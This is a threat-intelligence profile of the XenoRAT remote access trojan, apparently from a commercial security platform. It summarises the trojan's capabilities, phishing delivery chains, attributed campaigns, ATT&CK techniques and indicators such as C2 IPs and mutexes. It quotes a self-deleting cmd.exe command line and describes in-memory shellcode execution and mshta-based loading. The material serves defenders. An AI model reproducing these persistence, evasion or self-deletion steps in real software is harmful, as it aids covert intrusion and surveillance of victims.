XenoRAT
XenoRAT is an open-source .NET remote access trojan publicly available on GitHub and used by multiple threat actors for persistent remote access, surveillance, and post-exploitation. Reported capabilities include encrypted TCP command-and-control, dynamic DLL loading via Assembly.Load, file operations, command execution, keylogging, screen capture, clipboard monitoring, webcam and microphone surveillance, SOCKS5 tunneling or reverse proxying, Hidden VNC/HVNC, process manipulation, file exfiltration, antivirus enumeration, and self-uninstall. Observed persistence mechanisms include HKCU\Software\Microsoft\Windows\CurrentVersion\Run entries, scheduled tasks such as XenoUpdateManager, and mutexes including clouda and Xeno_rat_nd8912d.
The malware has been delivered through spear-phishing emails, ZIP archives containing malicious LNK files, HTA and PowerShell chains, BAT/VBS/Python loaders, GitHub-hosted payloads, drive-by delivery, and Excel XLL add-ins built with Excel-DNA. Multiple campaigns used decoy PDFs or documents while silently installing XenoRAT. In Seqrite’s Operation XENOFISCAL, a Pakistan-linked SideCopy cluster under the Transparent Tribe/APT36 umbrella targeted Afghanistan’s Ministry of Finance and provincial finance offices using Pashto-language phishing lures, mshta.exe, obfuscated JavaScript, in-memory .NET loading, and a compromised Afghan education domain, ultimately deploying XenoRAT 1.8.7 and communicating with 185.235.137.106. Fortinet also linked earlier DPRK-related LNK campaigns targeting South Korean organizations to XenoRAT distribution before later variants shifted toward deeper surveillance using GitHub-based C2. AhnLab documented South Korea-focused spear-phishing chains that exfiltrated system information and deployed XenoRAT. Breakglass Intelligence observed a German-language SERPENTINE#CLOUD wave targeting German small businesses that injected XenoRAT v1.8.7 into explorer.exe via Early Bird APC injection and used C2 176.96.136.182, install path %LOCALAPPDATA%\XenoManager, and startup name XenoUpdateManager. Securonix also observed XenoRAT delivered as encrypted shellcode blob xn.bin and injected into suspended explorer.exe processes.
A customized variant, MoonPeak, is described as a modified XenoRAT codebase associated with DPRK-linked activity, including campaigns targeting South Korean users and financially motivated operations against retail cryptocurrency traders. Kimsuky reporting also lists XenoRAT among the group’s open-source RAT arsenal. High-confidence indicators directly mentioned in the content include C2 IPs 185.235.137.106, 176.96.136.182, and 27.102.137.88:443 for MoonPeak; mutexes clouda, Xeno_rat_nd8912d, and Dansweit_Hk65-PSAccerdle for MoonPeak; scheduled task names XenoUpdateManager, ChromeCheck, and EdgeCheck in related delivery chains; install path %LOCALAPPDATA%\XenoManager; and payload filenames such as xn.bin and frexs.bin.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
“Although XMRig CoinMiner is installed in the end, XenoRAT and a vulnerability scanner script are also installed.”
Groups observed using it
7 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Seqrite Labs identified a sophisticated SideCopy XenoRAT malware attack focused directly on government networks.
Seqrite Labs identified a sophisticated SideCopy XenoRAT malware attack focused directly on government networks.
The group’s arsenal includes proprietary malware such as PebbleDash, BabyShark, AppleSeed, and RandomQuery, as well as open-source RATs like xRAT, XenoRAT, and TutRAT.
While earlier versions spread the XenoRAT malware, the current version focuses on deep surveillance.
While earlier versions spread the XenoRAT malware, the current version focuses on deep surveillance.
“Although XMRig CoinMiner is installed in the end, XenoRAT and a vulnerability scanner script are also installed.”
Techniques & procedures
34 distinct techniques documented for this family, organized by ATT&CK tactic.
Reconnaissance
1 techniqueThis level of detail indicates that the threat actors conducted thorough prior reconnaissance.
Resource Development
1 techniqueThe malicious files were delivered through infrastructure hosted on Afghan government servers, allowing the attackers to blend their traffic with legitimate state communications and evade network-level detection.
Initial Access
2 techniquesThe attackers used phishing emails containing ZIP archives with a malicious file masquerading as an internal government document.
The complex intrusion sequence initiates through a tailored spear-phishing email delivery path. This electronic mail contains a compressed archive enclosing a fraudulent shortcut file.
Execution
5 techniquesIt connects to a hard-coded IP address using encrypted TCP traffic and registers itself through both a Windows Scheduled Task named “XenoUpdateManager” and a Registry Run key.
That loader DLL downloaded an encoded, GZIP-compressed blob from attacker-controlled URLs and unpacked it entirely in memory.
Subsequently, the remote web application processes a heavily obfuscated JavaScript payload within the host memory space.
The function manages the dynamic loading and execution of external DLL modules received through a remote Node connection... loads it dynamically using Assembly.Load.
Consequently, unsuspecting provincial finance officials clicked the attachment.
Persistence
2 techniquesIt connects to a hard-coded IP address using encrypted TCP traffic and registers itself through both a Windows Scheduled Task named “XenoUpdateManager” and a Registry Run key.
Privilege Escalation
3 techniquesIt connects to a hard-coded IP address using encrypted TCP traffic and registers itself through both a Windows Scheduled Task named “XenoUpdateManager” and a Registry Run key.
the malware directly allocates executable memory within the current process using the Windows API VirtualAlloc()... copies the reconstructed shellcode buffer into the allocated region... and transfers execution to the injected buffer through the CreateThread() API.
Stealth
11 techniquesThe loader script implements a custom Base64 decoding routine to hide its downstream modules.
This staged approach is commonly used in fileless malware... reconstruct the serialized payload entirely in memory without touching disk.
To ensure a long-term presence, the software establishes automated registry execution keys that masquerade as legitimate Windows applications.
the malware directly allocates executable memory within the current process using the Windows API VirtualAlloc()... copies the reconstructed shellcode buffer into the allocated region... and transfers execution to the injected buffer through the CreateThread() API.
It launches a hidden cmd.exe process with a Base64-decoded command (/C choice /C Y /N /D Y /T 3 & Del) that waits for a few seconds and then deletes the running executable file from disk.
The malware later decompresses and decodes the data to reconstruct the final HTA payload... The routine first decodes the Base64 blob... and utilizes the .NET GZipStream class to restore the original payload buffer.
Instead of dropping a binary immediately, the shortcut covertly launches the native Windows command tool mshta.exe. This legitimate system binary fetches an externally hosted hypertext application file from a compromised domain.
The malware runs a mutex called “clouda” to prevent duplicate instances.
The malware runs a mutex called “clouda” to prevent duplicate instances, and it queries installed antivirus products before reporting back to its operators.
The malware creates a directory named USOShared-1de48789-1285 under C:\Users\Public\ to store the next-stage HTA payload... The directory naming convention mimics application-generated cache or profile folders.
Specifically, the malware handles this payload reconstruction phase strictly within volatile memory.
Credential Access
1 techniqueDiscovery
3 techniquesThe script then checks whether the .NET Framework version v4.0.30319 is installed by querying the registry path HKLM\SOFTWARE\Microsoft\.NETFramework\v4.0.30319.
dynamically selects the download endpoint based on the victim operating system version. Systems identified as Windows 7 (Version 6.1) are redirected to an alternate payload location.
Collection
3 techniquesPerforms keylogging, screen capture, clipboard monitoring, and webcam/microphone surveillance.
Performs keylogging, screen capture, clipboard monitoring, and webcam/microphone surveillance.
Performs keylogging, screen capture, clipboard monitoring, and webcam/microphone surveillance.
Command and Control
7 techniquesSubsequently, once fully initialized, the backdoor implants open a persistent command channel back to the malicious operators. This outgoing data stream targets a dedicated server node located at internet protocol destination 185.235.137.106.
After the shortcut file launched mshta.exe, it pulled an HTML Application payload from abimj.edu.af... The final stage deployed XenoRAT 1.8.7... which established an encrypted connection to a bulletproof server in Frankfurt, Germany.
Supports SOCKS5 proxy-based network tunneling.
ConnectAndSetupAsync function is responsible for establishing and initializing a TCP-based command-and-control (C2) connection between the client and the remote server.
After the shortcut file launched mshta.exe, it pulled an HTML Application payload from abimj.edu.af... That loader DLL downloaded an encoded, GZIP-compressed blob from attacker-controlled URLs and unpacked it entirely in memory.
Once opened, the file silently installed XenoRAT, an open-source remote access trojan that allows attackers to maintain long-term access to infected systems.
The final stage deployed XenoRAT 1.8.7... which established an encrypted connection to a bulletproof server in Frankfurt, Germany... It connects to a hard-coded IP address using encrypted TCP traffic.
Other
1 techniqueIOCs tracked for this family
40 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
28 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
An open-source remote access trojan used in a targeted espionage campaign against government networks. It is delivered via spear-phishing, executed through a fileless chain using mshta.exe and obfuscated JavaScript/.NET payload reconstruction in memory, then establishes persistence via registry run keys and opens a command channel to attacker-controlled infrastructure.
Open-source remote access trojan used by SideCopy in Operation XENOFISCAL to establish persistent access, communicate over encrypted TCP, register persistence via a scheduled task and Registry Run key, prevent duplicate execution with a mutex, and query installed antivirus products before reporting to operators.
An open-source remote access trojan used to maintain long-term access to infected systems, connect to attacker-controlled servers, spy on infected computers, and enable additional malicious activities.
Open-source remote access trojan used for persistent remote access, surveillance, and post-exploitation. The report describes encrypted TCP C2, dynamic in-memory DLL loading, command execution, file management, keylogging, screen capture, clipboard monitoring, webcam/microphone surveillance, SOCKS5 tunneling, persistence via Scheduled Tasks and Run keys, and self-uninstall/self-deletion.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.